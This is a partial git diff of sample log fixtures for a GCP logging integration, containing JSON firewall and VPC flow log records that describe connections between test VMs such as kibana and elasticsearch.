+{"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} +{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"} +{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"} +{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} +{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} +{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.168.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} +{"insertId":"5a27u1g22jks9e","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":45068},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.850729583Z"} +{"insertId":"5a27u1g22jks8t","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":45062},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.85023465Z"} {"insertId":"1dobeotg13df9f5","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"10.42.0.10","src_port":57794},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} diff --git a/packages/gcp/_dev/deploy/docker/sample_logs/vpcflow.log b/packages/gcp/_dev/deploy/docker/sample_logs/vpcflow.log index 6e27f806daa..9d9cf86c8df 100644 --- a/packages/gcp/_dev/deploy/docker/sample_logs/vpcflow.log +++ b/packages/gcp/_dev/deploy/docker/sample_logs/vpcflow.log @@ -1,296 +1,296 @@ -{"insertId":"ut8lbrffooxyw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.12","dest_port":33478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzb","jsonPayload":{"bytes_sent":"173663","connection":{"dest_ip":"10.87.40.76","dest_port":33970,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"68","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxze","jsonPayload":{"bytes_sent":"155707","connection":{"dest_ip":"203.0.113.134","dest_port":33576,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821143836Z","packets_sent":"78","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyz","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.0.2.23","dest_port":59679,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz6","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.0.2.117","dest_port":50646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzf","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":50646},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz1","jsonPayload":{"bytes_sent":"186151","connection":{"dest_ip":"10.87.40.76","dest_port":33692,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyp","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"92","reporter":"SRC","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzd","jsonPayload":{"bytes_sent":"250864","connection":{"dest_ip":"10.87.40.76","dest_port":33554,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"247","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz8","jsonPayload":{"bytes_sent":"167939","connection":{"dest_ip":"10.87.40.76","dest_port":33880,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821308944Z","packets_sent":"63","reporter":"DEST","rtt_msec":"3","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.469099728Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyt","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.0.2.23","src_port":59679},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz5","jsonPayload":{"bytes_sent":"11773","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"94","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxza","jsonPayload":{"bytes_sent":"65699","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393910944Z","packets_sent":"356","reporter":"DEST","rtt_msec":"192","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074897435Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyq","jsonPayload":{"bytes_sent":"66029","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"361","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz2","jsonPayload":{"bytes_sent":"65154","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyo","jsonPayload":{"bytes_sent":"13643","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"99","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxzc","jsonPayload":{"bytes_sent":"34509840","connection":{"dest_ip":"10.49.136.133","dest_port":46864,"protocol":6,"src_ip":"203.0.113.93","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:29.432367659Z","packets_sent":"8690","reporter":"DEST","rtt_msec":"36","start_time":"2019-06-14T03:40:17.343890802Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxz7","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":34836},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} -{"insertId":"ut8lbrffooxyu","jsonPayload":{"bytes_sent":"63671","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33554},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"367","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500506974Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 